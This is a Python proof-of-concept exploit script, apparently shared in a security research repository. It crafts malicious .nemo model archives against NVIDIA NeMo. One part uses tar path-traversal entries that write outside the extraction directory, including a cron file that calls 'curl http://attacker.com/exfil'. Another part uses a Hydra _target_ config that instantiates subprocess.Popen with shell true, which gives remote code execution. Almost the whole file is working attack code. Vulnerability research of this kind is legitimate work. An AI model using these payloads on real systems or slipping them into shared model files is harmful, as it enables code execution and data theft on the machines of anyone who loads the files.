exploits / nemo /craft_malicious_nemo.py

Upload nemo/craft_malicious_nemo.py with huggingface_hub

20db0ae verified about 1 month ago

6.94 kB

	"""
	PoC: NeMo Path Traversal + Hydra _target_ Injection
	=====================================================
	Crafts malicious .nemo files demonstrating two vulnerabilities:

	1. Path Traversal: tar.extract() in model_utils.py without _safe_extract()
	2. Hydra Injection: _target_ field in config instantiates arbitrary classes

	Usage:
	python craft_malicious_nemo.py # Generate both PoCs
	python craft_malicious_nemo.py --type traversal # Path traversal only
	python craft_malicious_nemo.py --type hydra # Hydra injection only
	python craft_malicious_nemo.py --verify # Show archive contents

	This is for authorized security research only.
	"""

	import tarfile
	import io
	import os
	import argparse


	def craft_path_traversal_nemo(output_path="path_traversal.nemo"):
	"""
	Create a .nemo file with path traversal in tar entry names.

	When model_utils.load_config() or save_artifacts() processes this file,
	tar.extract() writes files outside the intended directory because
	_safe_extract() is NOT used in model_utils.py (only in save_restore_connector.py).
	"""

	with tarfile.open(output_path, "w:") as tar:
	# 1. Legitimate model_config.yaml (required for detect_prefix())
	config_content = b"""model:
	name: poc_path_traversal
	target: nemo_test
	class_path: nemo.collections.asr.models.EncDecCTCModel
	"""
	config_info = tarfile.TarInfo(name="model_config.yaml")
	config_info.size = len(config_content)
	tar.addfile(config_info, io.BytesIO(config_content))

	# 2. Path traversal entry — escapes extraction directory
	# When load_config calls tar.extract(f"{prefix}{MODEL_CONFIG}", path=tmp)
	# the prefix from detect_prefix() is "", so it extracts "model_config.yaml"
	# But save_artifacts extracts arbitrary artifact paths from the tar,
	# and a crafted artifact path can escape.
	payload = b"PATH_TRAVERSAL_SUCCESSFUL - written outside extraction dir\n"

	# Traversal via artifact name
	traversal_info = tarfile.TarInfo(name="../../../../tmp/nemo_poc_escaped.txt")
	traversal_info.size = len(payload)
	tar.addfile(traversal_info, io.BytesIO(payload))

	# Additional traversal — overwrite a more dangerous location
	payload2 = b"# Malicious cron job\n* * * * * curl http://attacker.com/exfil\n"
	traversal_info2 = tarfile.TarInfo(name="../../../../tmp/nemo_poc_cron")
	traversal_info2.size = len(payload2)
	tar.addfile(traversal_info2, io.BytesIO(payload2))

	file_size = os.path.getsize(output_path)
	print(f"[+] Path traversal .nemo written to: {output_path}")
	print(f" Size: {file_size} bytes")
	print()
	print(" Tar contents:")
	with tarfile.open(output_path, "r:") as tar:
	for member in tar.getmembers():
	escape = " <-- PATH TRAVERSAL" if ".." in member.name else ""
	print(f" {member.name}{escape}")
	print()
	print("[!] When loaded by nemo.utils.model_utils.load_config():")
	print(" tar.extract() has NO path validation (_safe_extract not used)")
	print(" Files are written outside the temp extraction directory")
	return output_path


	def craft_hydra_injection_nemo(output_path="hydra_injection.nemo"):
	"""
	Create a .nemo file with Hydra _target_ injection in config.

	When setup_optimization() processes this config, it calls
	hydra.utils.instantiate() with the attacker-controlled _target_,
	which can point to subprocess.Popen or any importable class.
	"""

	# Config with malicious _target_ pointing to subprocess.Popen
	config_content = b"""model:
	name: poc_hydra_injection
	target: nemo_test
	optim:
	_target_: subprocess.Popen
	args:
	- "echo HYDRA_TARGET_INJECTION_SUCCESSFUL"
	shell: true
	sched:
	name: CosineAnnealing
	warmup_steps: 100
	"""

	with tarfile.open(output_path, "w:") as tar:
	config_info = tarfile.TarInfo(name="model_config.yaml")
	config_info.size = len(config_content)
	tar.addfile(config_info, io.BytesIO(config_content))

	# Add a dummy weights file to look like a real .nemo
	weights = b"\x00" * 64
	weights_info = tarfile.TarInfo(name="model_weights.ckpt")
	weights_info.size = len(weights)
	tar.addfile(weights_info, io.BytesIO(weights))

	file_size = os.path.getsize(output_path)
	print(f"[+] Hydra injection .nemo written to: {output_path}")
	print(f" Size: {file_size} bytes")
	print()
	print(" Tar contents:")
	with tarfile.open(output_path, "r:") as tar:
	for member in tar.getmembers():
	print(f" {member.name}")
	print()
	print(" Malicious config excerpt:")
	print(" optim:")
	print(" _target_: subprocess.Popen <-- ARBITRARY CLASS INSTANTIATION")
	print(' args: ["echo HYDRA_TARGET_INJECTION_SUCCESSFUL"]')
	print(" shell: true")
	print()
	print("[!] When loaded by NeMo and setup_optimization() is called:")
	print(" hydra.utils.instantiate({_target_: 'subprocess.Popen', ...})")
	print(" -> Instantiates subprocess.Popen with attacker args -> RCE")
	return output_path


	def main():
	parser = argparse.ArgumentParser(description="NeMo PoC generator")
	parser.add_argument("--type", choices=["traversal", "hydra", "both"],
	default="both", help="Which PoC to generate")
	parser.add_argument("--verify", action="store_true",
	help="Show archive contents after generation")
	parser.add_argument("--output-dir", default=".", help="Output directory")
	args = parser.parse_args()

	paths = []

	if args.type in ("traversal", "both"):
	path = craft_path_traversal_nemo(
	os.path.join(args.output_dir, "path_traversal.nemo"))
	paths.append(path)
	print()

	if args.type in ("hydra", "both"):
	path = craft_hydra_injection_nemo(
	os.path.join(args.output_dir, "hydra_injection.nemo"))
	paths.append(path)
	print()

	if args.verify:
	for path in paths:
	print(f"=== Verifying {path} ===")
	with tarfile.open(path, "r:") as tar:
	for member in tar.getmembers():
	print(f" {member.name} ({member.size} bytes)")
	if member.name == "model_config.yaml":
	f = tar.extractfile(member)
	if f:
	print(f" Config preview:")
	for line in f.read().decode().split("\n")[:10]:
	print(f" {line}")
	print()


	if __name__ == "__main__":
	main()